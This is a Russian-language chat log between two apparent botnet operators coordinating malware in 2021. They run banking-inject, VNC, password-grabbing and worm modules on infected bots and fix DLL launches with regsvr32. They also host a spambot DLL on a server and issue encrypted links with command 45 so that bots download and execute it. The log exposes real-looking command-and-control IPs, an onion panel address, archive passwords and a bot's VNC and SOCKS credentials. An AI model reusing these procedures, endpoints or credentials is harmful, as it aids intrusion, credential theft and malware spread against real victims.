[19.08.21 17:18:31] angelo:		скажи
[19.08.21 17:18:43] angelo:		вот Адам запустил новый модуль на боты
[19.08.21 17:18:48] angelo:		можно увидеть это ?
[19.08.21 17:18:56] angelo:		ты или Франк
[19.08.21 17:29:48] angelo:		3B3B2A7B74C33F7433B3F613570577FF
[23.08.21 11:51:01] angelo:		Аве Цезарь !
[23.08.21 11:51:15] angelo:		ты можешь смотреть ботов ведь в харинилищах ?
[23.08.21 11:51:17] angelo:		розовых
[23.08.21 12:00:54] cesar:		привет
[23.08.21 12:00:59] cesar:		неа
[23.08.21 12:01:06] cesar:		попробуй франку написать
[23.08.21 12:01:16] cesar:		может он скажет кто может посмотреть
[23.08.21 12:01:35] angelo:		ок
[24.08.21 10:02:20] angelo:		привет ! Помнишь ты говорил что можно на отдельно взятом боте перегрузить моудль ?
[24.08.21 10:02:23] angelo:		а как это сделать ?
[24.08.21 10:02:36] cesar:		привет
[24.08.21 10:02:51] cesar:		повторно отдать 62 module start
[24.08.21 10:03:10] cesar:		второй вариант - выгрузить модуль
[24.08.21 10:03:19] cesar:		62 module release
[24.08.21 10:03:46] angelo:		так, секунду, то есть скорее всего Адам просто загрузил модуль второй раз ?!
[24.08.21 10:03:54] angelo:		по всем ботам
[24.08.21 10:04:56] cesar:		скорее всего
[24.08.21 10:05:01] cesar:		и это нормально
[25.08.21 07:46:08] angelo:		привет
[25.08.21 07:46:16] angelo:		перегружали вчера модуль, вроде норм
[25.08.21 07:46:19] cesar:		привет
[25.08.21 07:46:23] angelo:		отрабатывал как нужно
[25.08.21 07:46:29] angelo:		скажи а чт ос ВНЦ ?!
[25.08.21 07:46:35] angelo:		может есть инфа, вчера упал он
[25.08.21 07:46:40] angelo:		Адам партизан
[25.08.21 07:46:51] cesar:		связываюсь с адамом, похоже прокладка
[25.08.21 07:47:02] angelo:		понял ((
[25.08.21 12:48:34] angelo:		нна помощь
[25.08.21 12:48:43] angelo:		я не могу с Дефом поговорить
[25.08.21 12:49:10] angelo:		[05:33:43] <defender@> чтооооо именно не срабатывает? 
[05:33:52] <azot> инжекты через ВНЦ 
[05:34:00] <azot> модуль инжект 
[05:34:13] <azot> не идут данные в панель 
[05:34:15] <azot> Зевсу 
[05:34:21] <defender@> а зачем тебе розовая? 
[05:34:31] <azot> ок, а как запускать внц ?! 
[05:35:19] <azot> в черной я запускаю непосредственно модуль, в розовой получаю доступ, нажимая Get, разве не так ?! 
[05:35:23] <defender@> ты на любом нажми старт и посмотри в черной какая команда будет 
[05:35:32] <defender@> так 
[05:36:13] <azot> то есть я могу отдать команду внц в черной админке ? 
[05:37:06] <azot> напиши команду
[25.08.21 12:49:23] angelo:		так как дать доступ внц модулю
[25.08.21 12:56:12] angelo:		может есть команда для внц на запуск кроме старт ?
[25.08.21 13:21:11] angelo:		vnc3Dll start  63
[25.08.21 13:21:12] angelo:		это для нового внц так ?
[25.08.21 14:56:45] cesar:		62 vnc3Dll start
[25.08.21 14:58:23] cesar:		хаммер пишет - Там у анжело бот после перезагрузки не оживает
[25.08.21 14:58:32] cesar:		что за проблема?
[25.08.21 15:58:48] angelo:		проблема есть
[25.08.21 15:58:50] angelo:		и у меня и у Хайми
[25.08.21 15:59:13] angelo:		у меня никаких ошибок не вылетало
[25.08.21 15:59:20] angelo:		у Хайми при перегрузки пишет ошибку
[25.08.21 15:59:28] angelo:		модуль не найден
[25.08.21 15:59:29] angelo:		ДЛЛран
[25.08.21 15:59:42] angelo:		АВ выкл
[25.08.21 15:59:52] angelo:		бот zev4
[25.08.21 15:59:57] angelo:		брал с панели сегодня
[25.08.21 16:54:30] cesar:		а как долго бот работал у него?
[25.08.21 16:54:43] cesar:		может не успел скопироваться
[25.08.21 16:54:50] cesar:		там не сразу
[25.08.21 16:55:00] angelo:		ну точно час
[25.08.21 16:55:06] angelo:		у меня итого больше
[25.08.21 16:55:14] angelo:		работали боты точно
[25.08.21 16:55:24] angelo:		то есть по админке смотрели активнсоть
[25.08.21 16:55:29] cesar:		и стучали в админку?
[25.08.21 16:55:30] angelo:		а потом констатировали их смерть
[25.08.21 16:55:35] angelo:		стучали
[25.08.21 16:55:43] angelo:		апосле перегруза всё
[25.08.21 16:55:49] angelo:		помянули
[25.08.21 16:55:51] cesar:		на 10ке?
[25.08.21 16:55:55] angelo:		да
[25.08.21 16:56:01] angelo:		яум4
[25.08.21 16:56:04] angelo:		zev4
[25.08.21 16:56:09] cesar:		ок, буду проверять
[25.08.21 16:56:21] cesar:		а брали криптованный?
[25.08.21 16:56:25] angelo:		два бота, не один, практически статистика
[25.08.21 16:56:28] angelo:		да
[25.08.21 16:56:33] angelo:		с панели
[25.08.21 16:56:34] angelo:		Сэма
[25.08.21 16:56:46] angelo:		zev4AdeHcvJ.dll
[25.08.21 16:56:53] cesar:		ок
[25.08.21 17:18:31] cesar:		а как запускали длл?
[25.08.21 17:18:31] cesar:		а как запускали длл?
[25.08.21 17:18:32] cesar:		а какой командой запускали длл?
[25.08.21 17:18:32] cesar:		а какой командой запускали длл?
[25.08.21 17:18:32] cesar:		а какой командой запускали длл?
[25.08.21 17:27:09] angelo:		regsvr32 zev4AdeHcvJ.dll
[25.08.21 17:27:16] angelo:		первые сообщения не вижу юро
[25.08.21 17:27:19] angelo:		бро
[25.08.21 18:00:05] cesar:		а нужно regsvr32 c:\path\zev4AdeHcvJ.dll
[25.08.21 18:00:54] angelo:		вот сейчас не понял
[25.08.21 18:01:16] angelo:		какая разница где локация файла ?
[25.08.21 18:01:21] angelo:		для запуска
[25.08.21 18:01:45] angelo:		я ж запускаю из папки с ботом
[25.08.21 18:02:03] cesar:		это важно
[25.08.21 18:02:17] cesar:		попробуйте запускать так и все будет работать
[25.08.21 18:02:38] angelo:		погоди
[25.08.21 18:02:46] angelo:		не понял
[25.08.21 18:02:53] angelo:		мне нужно создать папку path ?
[25.08.21 18:02:58] cesar:		нет
[25.08.21 18:02:59] angelo:		запихнуть туда бота и запускать ?
[25.08.21 18:03:06] cesar:		указать полный путь к файлу
[25.08.21 18:03:16] cesar:		не только имя
[25.08.21 18:03:16] angelo:		ааааааа
[25.08.21 18:03:22] cesar:		а именно полный путь
[25.08.21 18:03:25] angelo:		впервые слышу
[25.08.21 18:03:31] angelo:		никто не говорил
[25.08.21 18:03:39] angelo:		тот же Мануэль так же пускает
[25.08.21 18:04:09] cesar:		всем тестерам говорил
[25.08.21 18:04:42] cesar:		тоже самое и с rundll32
[25.08.21 18:06:03] angelo:		ок
[25.08.21 18:06:54] angelo:		проверим
[25.08.21 18:32:30] angelo:		Цез помоги с внц а
[25.08.21 18:32:50] cesar:		?
[25.08.21 18:33:11] angelo:		запустили мы внц модуль
[25.08.21 18:33:15] angelo:		а как дальше
[25.08.21 18:33:18] angelo:		есть список
[25.08.21 18:33:24] angelo:		как там искать то
[25.08.21 18:33:37] cesar:		а какая у тебя задача стоит?
[25.08.21 18:33:49] angelo:		зайти оп внц на машину )
[25.08.21 18:33:54] angelo:		всё банально просто
[25.08.21 18:34:04] angelo:		http://195.123.212.155:8081/api/online/get
[25.08.21 18:34:12] angelo:		вот есть это Б*** список
[25.08.21 18:34:19] angelo:		но как там искать бота то ?
[25.08.21 18:34:59] cesar:		по botid например
[25.08.21 18:35:26] cesar:		а, тебе дали старый список
[25.08.21 18:35:31] angelo:		не
[25.08.21 18:35:34] angelo:		эт новый
[25.08.21 18:35:38] cesar:		новый по другому адресу
[25.08.21 18:35:40] angelo:		Грем сказал
[25.08.21 18:35:43] angelo:		еп
[25.08.21 18:35:46] angelo:		есть ?
[25.08.21 18:35:58] cesar:		http://195.123.212.155:9091/api/online/list
[25.08.21 18:36:26] cesar:		или
[25.08.21 18:36:33] cesar:		http://195.123.212.155:9091/api/online/get
[25.08.21 18:38:06] angelo:		и нету тут такого
[25.08.21 18:38:36] cesar:		а какой модуль запускал?
[25.08.21 18:38:49] cesar:		vnc3Dll ?
[25.08.21 18:39:08] angelo:		да
[25.08.21 18:39:15] angelo:		зашел в хранилище
[25.08.21 18:39:15] angelo:		и
[25.08.21 18:39:30] angelo:		Error
Server give answer, but not send VNC params. Close dialog and try again.
[25.08.21 18:40:05] cesar:		так, и что это значит?
[25.08.21 18:40:26] angelo:		ну это отправка гет
[25.08.21 18:40:31] angelo:		херня какая-то
[25.08.21 18:40:38] angelo:		вот и в списках нету
[25.08.21 18:41:27] cesar:		ты через черную админку запускал модуль?
[25.08.21 18:41:56] angelo:		да
[25.08.21 18:42:32] cesar:		дай id бота, запустился там модуль?
[25.08.21 18:42:43] angelo:		вроде как да
[25.08.21 18:43:02] angelo:		70BB343FD97E3B4711D1BB6A13D5A374
[25.08.21 18:43:38] cesar:		бот же тестовый?
[25.08.21 18:44:01] angelo:		да
[25.08.21 18:44:11] cesar:		работает сейчас эта машина? бот стучит?
[25.08.21 18:44:18] angelo:		да
[25.08.21 18:44:30] cesar:		а какая группа?
[25.08.21 18:44:39] angelo:		tst31
[25.08.21 18:45:30] cesar:		DESKTOP-U81TONL_W10019042.70BB343FD97E3B4711D1BB6A13D5A374
[25.08.21 18:45:55] cesar:		"botid": "DESKTOP-U81TONL_W10019042.70BB343FD97E3B4711D1BB6A13D5A374",
			"group": "tst31",
			"hash_id": 3054445754,
			"hash_gr": 2633035604,
			"con_time": 1629916909,
			"last_time": 1629917090,
			"ip": "96.31.67.12",
			"vnc_pass": "uiQPtlTv",
			"socks_auth": "9CF0EF54:B60F24BA"
[25.08.21 18:46:15] angelo:		как ?
[25.08.21 18:46:17] angelo:		где ?
[25.08.21 18:46:22] angelo:		где ты это смотришь ?
[25.08.21 18:46:33] cesar:		в get
[25.08.21 18:46:37] cesar:		uiQPtlTv|DESKTOP-U81TONL_W10019042.70BB343FD97E3B4711D1BB6A13D5A374|96.31.67.12|VNC:195.123.212.155:9093:uiQPtlTv|Socks:195.123.212.155:9092:9CF0EF54:B60F24BA|Country: United States Region: North America City: N/A,
[25.08.21 18:46:47] cesar:		а это в лист
[25.08.21 18:47:13] cesar:		может недавно появился
[25.08.21 18:47:24] angelo:		да
[25.08.21 18:47:26] angelo:		недавно
[25.08.21 18:47:28] cesar:		искал по твоему id - тоже не находил
[25.08.21 18:47:28] angelo:		видать
[25.08.21 18:47:31] angelo:		долго конечно
[25.08.21 18:59:33] angelo:		спасибо
[26.08.21 07:44:59] angelo:		привет
[26.08.21 07:45:05] angelo:		будь другом посомтри бота 043EFB309D1FBB31D7BB8EFB36F4BFA3
[26.08.21 07:45:38] angelo:		отдаю команду 
63 vnc3Dll start
[26.08.21 07:45:45] angelo:		и она пропадает из списка
[26.08.21 07:45:55] angelo:		если что вижу что запустил нетворк второй раз
[26.08.21 07:46:12] cesar:		привет
[26.08.21 07:46:32] cesar:		админка 3 ?
[26.08.21 07:46:32] angelo:		вчера все пытался и никак
[26.08.21 07:46:42] angelo:		kwwka7a
[26.08.21 07:46:48] angelo:		нумерацию не знаю
[26.08.21 07:47:15] cesar:		ок
[26.08.21 07:47:39] cesar:		это 2ая
[26.08.21 07:48:13] cesar:		62
[26.08.21 07:48:21] cesar:		команда 62
[26.08.21 07:48:26] cesar:		63 нет такой
[26.08.21 07:48:31] cesar:		!!!
[26.08.21 07:49:26] cesar:		что вы там курите, сэр? )))
[26.08.21 07:52:40] angelo:		сэр но вчера 63 отрабатывала
[26.08.21 07:53:10] angelo:		и видел в админке клиента команду на запуск 63
[26.08.21 07:54:02] cesar:		63 это приходит команда от бота, результат
[26.08.21 07:54:32] angelo:		ой
[26.08.21 07:54:38] angelo:		ну прости дурака
[26.08.21 07:54:51] cesar:		да все норм
[26.08.21 07:55:06] angelo:		я гением никогда и не представлялся )
[26.08.21 07:55:19] cesar:		да ладно )
[26.08.21 08:16:24] angelo:		как удалить бота из черной  ?
[26.08.21 08:16:29] angelo:		у нас там впн слетал
[26.08.21 08:16:34] angelo:		хотелось бы удалить
[26.08.21 08:16:58] angelo:		кнопка Делит внизу где кнопка на команды ?
[26.08.21 08:19:34] angelo:		71F589B3A3BDB3FF479B9CBB34FF7527 можешь удалить ?
[26.08.21 08:22:09] cesar:		всмысле удалить бота?
[26.08.21 08:22:31] cesar:		удалить можно бота на машине
[26.08.21 08:22:45] cesar:		в админке чтобы удалить из статистики нужно писать админу
[26.08.21 08:22:51] cesar:		адаму
[26.08.21 08:31:45] angelo:		ох ты ж
[26.08.21 08:31:51] angelo:		понял
[26.08.21 16:16:09] angelo:		привет снова я
[26.08.21 16:16:18] angelo:		ты не заливал что Хайми скидывал ?
[26.08.21 16:17:12] cesar:		не скачал сразу,  потом выпал из чата
[26.08.21 16:17:23] cesar:		и не вижу уже сообщения
[26.08.21 16:17:38] cesar:		написал ему, чтобы он повторил
[26.08.21 16:18:35] angelo:		окай
[30.08.21 09:45:11] angelo:		привет!
[30.08.21 09:45:30] angelo:		можешь на группе 31 отключить автоматический запуск чего либо ?
[30.08.21 09:45:30] angelo:		tst31
[30.08.21 10:21:42] cesar:		привет, это к адаму
[30.08.21 10:22:03] cesar:		могу сделать бот, который запускает модули по команде 61
[30.08.21 10:22:17] cesar:		он тогда будет игнорировать команды из админки
[30.08.21 10:22:28] angelo:		не трудно будет ?
[30.08.21 10:22:35] cesar:		мин черз 15 скину
[30.08.21 10:22:40] angelo:		не горит
[30.08.21 10:22:42] angelo:		спс
[30.08.21 10:23:01] cesar:		pwgrab же тоже не ставить в автозагрузку?
[30.08.21 10:29:59] angelo:		не
[30.08.21 10:30:00] angelo:		ничего
[30.08.21 10:30:08] angelo:		он ж нам не нужен для тестов инжекта
[30.08.21 10:30:49] cesar:		ок
[31.08.21 08:38:07] angelo:		Привет
[31.08.21 08:38:12] angelo:		нужно залить релиз на инжект
[31.08.21 08:38:17] cesar:		привет
[31.08.21 08:38:25] cesar:		закидывай
[31.08.21 08:38:25] angelo:		перекинуть вернеее
[31.08.21 08:38:30] angelo:		с тинджекта на инжет
[31.08.21 08:38:32] cesar:		вчерашний?
[31.08.21 08:38:34] angelo:		угу
[31.08.21 08:38:36] cesar:		ок
[31.08.21 08:38:43] cesar:		там только 64 битный
[31.08.21 08:38:47] cesar:		его залью
[31.08.21 08:38:51] angelo:		окай
[31.08.21 08:53:36] cesar:		залито
[31.08.21 08:53:40] cesar:		на обе админки
[31.08.21 08:58:29] angelo:		угу
[31.08.21 08:58:32] angelo:		спс!
[02.09.21 09:01:47] angelo:		привет
[02.09.21 09:01:50] angelo:		а что с cceqv5
[02.09.21 09:02:41] cesar:		привет
[02.09.21 09:04:28] cesar:		напишу дефу, линк недоступен
[02.09.21 09:09:01] angelo:		ок
[02.09.21 09:16:07] cesar:		повтори плиз
[02.09.21 09:16:17] cesar:		выпал
[02.09.21 09:23:25] angelo:		главное не из окна бро
[02.09.21 09:24:03] angelo:		а тебе уже заливали новый внц ?
[02.09.21 09:24:06] angelo:		исправленный
[02.09.21 09:30:02] cesar:		он залит уже в продакшен
[02.09.21 12:32:33] angelo:		можешь посомтреть
[02.09.21 12:32:34] angelo:		69F371F799F2833B6FB974F5FF9B31D1
[02.09.21 12:32:39] angelo:		я загрузил внц или нет ?!
[02.09.21 13:01:57] angelo:		чет бред какой-то
[02.09.21 13:09:53] cesar:		сек
[02.09.21 13:12:17] cesar:		нет, не смог
[02.09.21 13:12:18] cesar:		10 Download failed
[02.09.21 13:12:31] cesar:		запусти еще раз
[02.09.21 13:15:21] angelo:		впервые такая ошибка
[02.09.21 13:15:25] angelo:		там всё норм на серваке ?
[02.09.21 13:15:34] angelo:		а то нам надо инжект кровь из носа проверить с внец
[02.09.21 13:16:26] angelo:		даже админку грузит долго
[02.09.21 13:19:07] cesar:		скорее всего прокладки плохие на модулях, напишу адаму
[02.09.21 13:34:41] angelo:		а как ты думаешь, именно у модуля ?
[02.09.21 13:34:49] angelo:		или на другой админке попробовать ?
[02.09.21 13:36:43] cesar:		на другой будет работать
[02.09.21 14:04:02] angelo:		ага, норм
[02.09.21 14:04:05] angelo:		спасибо
[03.09.21 07:27:52] angelo:		привет!
[03.09.21 07:28:01] cesar:		привет
[03.09.21 07:28:10] angelo:		вчера запускал Хайми бота на 7ке
[03.09.21 07:28:17] angelo:		как тебе списочек папок на ВМ
[03.09.21 07:28:32] angelo:		(1:21:04 PM) flip: 09/02/2021  05:27 PM    <DIR>          .
09/02/2021  05:27 PM    <DIR>          ..
09/02/2021  05:27 PM           475,008 injectDll64
09/02/2021  05:01 PM            29,520 networkDll64
09/02/2021  05:26 PM           771,952 pwgrabb64
09/02/2021  05:25 PM           513,392 pwgrabc64
09/02/2021  04:58 PM            17,120 shareDll64
09/02/2021  05:00 PM           734,560 tabDll64
09/02/2021  04:58 PM           239,440 vnc3Dll64
[03.09.21 07:29:12] angelo:		это от Хаммера:
[03.09.21 07:29:17] angelo:		`нужно цезарю написать. что там свежие боты дохнут, видимо, из-за детекта макаффи, чтобыв перепроверил и почистил, а его нет`
[03.09.21 07:29:18] cesar:		да, на 7ке есть такое
[03.09.21 07:29:36] cesar:		ок, макафи проверю
[17.09.21 15:01:28] angelo:		Привет !
[17.09.21 15:01:36] angelo:		а можно в одном боте автозагруз убрать ?
[17.09.21 15:01:47] angelo:		запустили сейчас бота
[17.09.21 15:04:59] cesar:		привет
[17.09.21 15:05:20] cesar:		поподробнее напиши что нужно
[17.09.21 15:05:26] cesar:		и для чего
[17.09.21 15:05:34] angelo:		запустили один бот
[17.09.21 15:05:37] angelo:		Зев
[17.09.21 15:05:42] angelo:		для теста
[17.09.21 15:05:49] angelo:		а на него за будут сыпаться команды запуска
[17.09.21 15:06:20] cesar:		так, а для теста чего запускали?
[17.09.21 15:06:20] angelo:		1876173BF733F7FF33B773B773BFFB7F
[17.09.21 15:06:25] angelo:		черт уже посыпались )
[17.09.21 15:06:35] angelo:		внц + инжект
[17.09.21 15:07:06] cesar:		как вариант могу сделать тестовый, у которого модули будешь запускать вручную из черной админки
[17.09.21 15:07:11] cesar:		через команду 61
[17.09.21 15:07:33] angelo:		да мы уже этот запустили бот (
[17.09.21 15:07:41] angelo:		wormDll 	2021-09-17 15:06:02.589986 	infect 		
shareDll 	2021-09-17 15:05:43.421521 	infect 		
tabDll
[17.09.21 15:07:46] angelo:		как это выгрузить ?
[17.09.21 15:07:51] angelo:		название + релиз ?
[17.09.21 15:07:56] cesar:		они сами выгрузяться
[17.09.21 15:08:37] angelo:		ого, а я думал это такие же модули как внц или импорт или нетворк
[17.09.21 15:09:29] cesar:		нет, они отрабатывают и выгружаются
[17.09.21 15:11:35] angelo:		а что это за модули ?
[17.09.21 15:11:35] angelo:		если не впадлу
[17.09.21 15:11:47] angelo:		wormDll 
shareDll 
tabDll
[17.09.21 15:15:50] cesar:		размножение
[17.09.21 15:16:10] cesar:		через сетку, и т.д.
[20.09.21 10:15:14] angelo:		Аве бро !
[20.09.21 10:15:20] angelo:		можешь тестовый бот кинуть ?
[20.09.21 10:15:27] angelo:		31 был кажеться
[20.09.21 10:15:32] angelo:		чет найти не могу
[20.09.21 10:15:39] cesar:		привет
[20.09.21 10:16:02] cesar:		на 3тью админку, без загрузки модулей, запуск через 61 ?
[20.09.21 10:16:25] angelo:		всё так, но что за 3я админка ?
[20.09.21 10:16:41] angelo:		у меня эта cceqv5
[20.09.21 10:16:57] angelo:		и эта kwwka7
[20.09.21 10:17:00] angelo:		других нет
[20.09.21 10:18:10] cesar:		ну вот, на какую делать тестовый?
[20.09.21 10:18:19] cesar:		kwwka7 - 2ая
[20.09.21 10:18:21] angelo:		cceqv5
[20.09.21 10:18:27] cesar:		cceqv5 - 3тья
[20.09.21 10:18:30] cesar:		ок
[20.09.21 10:18:39] angelo:		буду иметь ввиду !
[20.09.21 10:34:04] cesar:		vAv2z71Nsb3Vwu6rHVc3rdrxd5
Download: https://qaz.im/load/erQ6tn/yb4i4d
Delete: https://qaz.im/index.php?a=delete&q=1416247485
[20.09.21 10:35:37] angelo:		не подходит пароль
[20.09.21 10:44:18] cesar:		сек
[20.09.21 10:44:58] cesar:		vAv2z71Nsb3Vwu6rHVc3rdrxd5
[20.09.21 10:45:06] cesar:		проверь последний пробел
[20.09.21 10:45:12] cesar:		не должно быть
[20.09.21 10:45:37] angelo:		неа
[20.09.21 10:45:48] angelo:		а у тебя получается ?
[20.09.21 10:47:18] cesar:		да
[20.09.21 10:47:51] angelo:		кинь `так`
[20.09.21 10:48:29] cesar:		`vAv2z71Nsb3Vwu6rHVc3rdrxd5`
[20.09.21 10:49:01] angelo:		ок норм
[20.09.21 10:49:02] angelo:		спс бро !
[20.09.21 15:13:19] angelo:		bin это ж exe да ?
[20.09.21 15:15:11] angelo:		чет бот у нас не просыпается
[20.09.21 16:40:45] cesar:		так и не проснулся?
[20.09.21 16:41:03] angelo:		неа
[20.09.21 16:41:07] angelo:		нашел старый тестовый
[20.09.21 16:41:13] angelo:		нарыл в закромах 31 группу
[20.09.21 16:41:54] cesar:		и он отработал?
[20.09.21 16:41:58] cesar:		а это нет?
[20.09.21 16:42:05] cesar:		а этот нет?
[20.09.21 16:42:12] angelo:		ага
[20.09.21 16:42:14] angelo:		старый норм
[20.09.21 16:42:18] angelo:		это не хотел никак
[20.09.21 16:43:39] cesar:		странно, может не ту группу искал?
[20.09.21 16:43:49] angelo:		ту ту
[20.09.21 16:43:52] angelo:		и по ипу
[20.09.21 16:43:55] angelo:		и по группе
[20.09.21 16:44:01] angelo:		cceqv5
[20.09.21 16:44:03] angelo:		искал не было
[20.09.21 16:44:09] angelo:		и бот висел в таске
[20.09.21 16:44:17] angelo:		всё время при запуске ХАйми сказал
[20.09.21 16:44:31] cesar:		странно, проверю
[20.09.21 16:44:59] angelo:		не вру, честно
[21.09.21 10:58:59] angelo:		Привет !
[21.09.21 10:59:12] cesar:		привет
[21.09.21 10:59:13] angelo:		Я правильно понимаю, чтобы запустить дллку через Трик. Нужно
[21.09.21 10:59:25] angelo:		запустить модуль нетворка и ловить бота в хранилише ?
[21.09.21 10:59:32] cesar:		из памяти?
[21.09.21 10:59:41] angelo:		угу
[21.09.21 10:59:41] cesar:		там есть 2 варианта
[21.09.21 10:59:43] angelo:		с компа
[21.09.21 10:59:49] angelo:		какой проще
[21.09.21 10:59:58] cesar:		проще с диска
[21.09.21 11:00:06] angelo:		каким методом ?
[21.09.21 11:00:34] cesar:		из розовой админки можно запустить длл только с диска
[21.09.21 11:00:52] angelo:		а из черной тоже можно с диска 0_0
[21.09.21 11:00:58] cesar:		да
[21.09.21 11:01:06] cesar:		и из памяти
[21.09.21 11:01:16] angelo:		можешь на пальцах как с диска пустить в черной
[21.09.21 11:01:59] cesar:		1) заливаешь длл на фтп или сервер, чтобы у тебя был линк на эту длл
[21.09.21 11:02:20] cesar:		2) скидываешь линк мне или дефу для шифрования
[21.09.21 11:02:42] angelo:		ой
[21.09.21 11:02:43] cesar:		3) и функцию в длл, которую нужно вызывать
[21.09.21 11:02:51] angelo:		оййй
[21.09.21 11:02:58] cesar:		я скидываю строку для запуска
[21.09.21 11:03:11] angelo:		я думал как в анкоре, можно загрузить ручками дллку и просто пустить
[21.09.21 11:03:34] angelo:		в розовой такой же метод ?
[21.09.21 11:04:06] cesar:		да, там только линк указываешь в аргументах и функцию вызова, шифруется автоматом
[21.09.21 11:05:04] angelo:		так, чутка понял, есть пример куда залить дллку можно ?
[21.09.21 11:05:14] angelo:		я таким не промышлял
[21.09.21 11:06:02] cesar:		всмысле залить некуда тестовую длл?
[21.09.21 11:06:13] angelo:		не-а
[21.09.21 11:06:23] angelo:		я не заливал на линки...
[21.09.21 11:06:28] angelo:		пару раз было дааавно
[21.09.21 11:06:40] cesar:		а что за длл?
[21.09.21 11:06:48] angelo:		спамбот
[21.09.21 11:06:53] angelo:		тебе писал basil
[21.09.21 11:07:07] cesar:		так ее из памяти запускать нужно
[21.09.21 11:07:19] cesar:		скидывай длл, там 64 бита?
[21.09.21 11:07:34] angelo:		86
[21.09.21 11:07:47] cesar:		я писал, что нужно 2 битности
[21.09.21 11:07:53] cesar:		ему
[21.09.21 11:07:59] angelo:		хм
[21.09.21 11:08:00] angelo:		ока ща
[21.09.21 11:08:03] cesar:		ты же на 64битной будешь тестирвоать?
[21.09.21 11:08:15] angelo:		да, и вспомнил
[21.09.21 11:08:24] angelo:		что не будет загружаться 32 на 64 винде
[21.09.21 11:08:32] cesar:		да
[21.09.21 11:10:57] angelo:		а можно будет 85 залить тольок ? пока, я ща винду подгоню 32 битку
[21.09.21 11:11:02] angelo:		86 )
[21.09.21 11:38:47] cesar:		можно
[21.09.21 11:42:20] angelo:		hJLHUILSYIujd8262t20[^@T72d3
[21.09.21 11:42:20] angelo:		https://send.exploit.in/download/369d452dafe48399/#ZUzZyhcJ6gdYDwdN6Lmfhw
[21.09.21 12:35:05] angelo:		Husly87t2l898y&;82gubjldsf
[21.09.21 12:35:33] angelo:		https://send.exploit.in/download/c0e99026769228da/#77qcT3xgJZvFh8B4RYZNsg
[21.09.21 12:35:42] angelo:		это 64 спамбот длл
[21.09.21 12:35:51] cesar:		ок
[21.09.21 12:36:17] angelo:		а то нам надо 64 протестить
[21.09.21 12:37:30] cesar:		залью скоро
[21.09.21 12:44:53] angelo:		ты просто знай ,что я тут в сторонке стою....
[21.09.21 12:59:03] cesar:		http://5.181.80.155/images/mlb32.dll
http://5.181.80.155/images/mlb64.dll
[21.09.21 12:59:27] cesar:		сейчас закину шифрованный на 64
[21.09.21 12:59:34] angelo:		окай
[21.09.21 13:00:18] cesar:		AAAAAD2tpgACJaHuLGmeMV06LeYSoaaNi87iY4HsX9XCWYYyJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADYANAAuAGQAbABsAMM+fWGF6MANRgJRmCUvbFE8C9vv/euUVCnI4H5uxfP4KdOFCegGRIUlu8eOx5SpUqB/mlxz4wltBXBEDbdH3v/WpdohP5rV79oGBb+XO3tszfVqxgc4dgE1Z8afrgl+rw==
[21.09.21 13:00:38] angelo:		кидай в меня тапком
[21.09.21 13:00:44] angelo:		а что теперь делать ?
[21.09.21 13:01:11] cesar:		пару минут
[21.09.21 13:02:55] cesar:		вводи команду 45
[21.09.21 13:03:00] cesar:		аргумент
[21.09.21 13:03:05] cesar:		AAAAAD2tpgACJaHuLGmeMV06LeYSoaaNi87iY4HsX9XCWYYyJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADYANAAuAGQAbABsAMM+fWGF6MANRgJRmCUvbFE8C9vv/euUVCnI4H5uxfP4KdOFCegGRIUlu8eOx5SpUqB/mlxz4wltBXBEDbdH3v/WpdohP5rV79oGBb+XO3tszfVqxgc4dgE1Z8afrgl+rw==
[21.09.21 13:03:21] cesar:		это для 64 бит
[21.09.21 13:03:28] angelo:		хера се
[21.09.21 13:03:30] angelo:		ща
[21.09.21 13:03:35] cesar:		т.е. бот работает на 64 битной машине
[21.09.21 13:03:52] angelo:		ага
[21.09.21 13:03:56] angelo:		через Пуш бек ?
[21.09.21 13:04:12] cesar:		да
[21.09.21 13:04:23] angelo:		я через cceqv5 админку
[21.09.21 13:04:26] cesar:		это для 32 битных зашифрованный линк
[21.09.21 13:04:28] cesar:		да
[21.09.21 13:04:32] cesar:		AAAAAPwfGAnmrfLr32VYFV/MkBYppG5SzVp57FnguaKyXjRxJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADMAMgAuAGQAbABsAC7sFf7MqV17WtPDdYsZ9mNTzMT+Qp+limVb31YlmDvgGaFayQdRkUNW006fP/e/sTC8Exqb+D+vNeH67YrkviZT3p/YrtLglxBnnhkRbcUK1k+Sx30JeNzEiOalMOxDUA==
[21.09.21 13:05:39] angelo:		сохранил
[21.09.21 13:06:44] angelo:		отдал команду
[21.09.21 13:07:20] cesar:		куда лог идет уточнял у базиля?
[21.09.21 13:07:35] cesar:		там логированные версии его длл
[21.09.21 13:07:49] angelo:		в папку Темп...
[21.09.21 13:08:40] angelo:		так я может чего-то не так сделал
[21.09.21 13:08:41] angelo:		https://cceqv5ulg6fc44budf3a4s5kkrhprk5okjmdtgmo6xevj2p2sxnkh3id.onion/log/18766872
[21.09.21 13:08:43] angelo:		вот бот
[21.09.21 13:08:58] angelo:		сделал Push Back
[21.09.21 13:09:12] angelo:		с командой 45 и прописал параметр с шифром
[21.09.21 13:09:40] cesar:		ну и все норм
[21.09.21 13:09:47] cesar:		10 ОК
[21.09.21 13:10:11] cesar:		ищи логи
[21.09.21 13:10:12] angelo:		понял, блин прости бро, просто в первые так делаю
[21.09.21 13:29:25] cesar:		перезалил файл 64 битный
[21.09.21 13:29:26] cesar:		AAAAAGGnrJaf70mtAt65vbgOSMpA8yHR67OC5j0u8mFs1OdtJAAAAGgAdAB0AHAAOgAvAC8ANQAuADEAOAAxAC4AOAAwAC4AMQA1ADUALwBpAG0AYQBnAGUAcwAvAG0AbABiADYANAAuAGQAbABsAEMs0C64VeyubWUi6sqt7+gZkKk9ByHjY4NVQNLl5SJJ9OQqkeOnhX9A/SEUMM5gDOp/h+ZxC15DoB2Cmg3SVAds3gFU87hU4ZhWRaMpVDPtCNcBNrs6qUPSSQ5yRqkHnQ==
[21.09.21 13:29:31] cesar:		новый шифр линк
[21.09.21 13:30:31] angelo:		с той командой ничего деалть не надо ?
[21.09.21 13:30:59] angelo:		запускаю
[21.09.21 13:33:15] cesar:		опять такую же отдавать
[21.09.21 13:33:28] angelo:		окай
[21.09.21 13:35:05] angelo:		всё норм
[21.09.21 13:35:09] angelo:		спасибули !
[21.09.21 13:53:45] angelo:		а можем не логированный залить ?
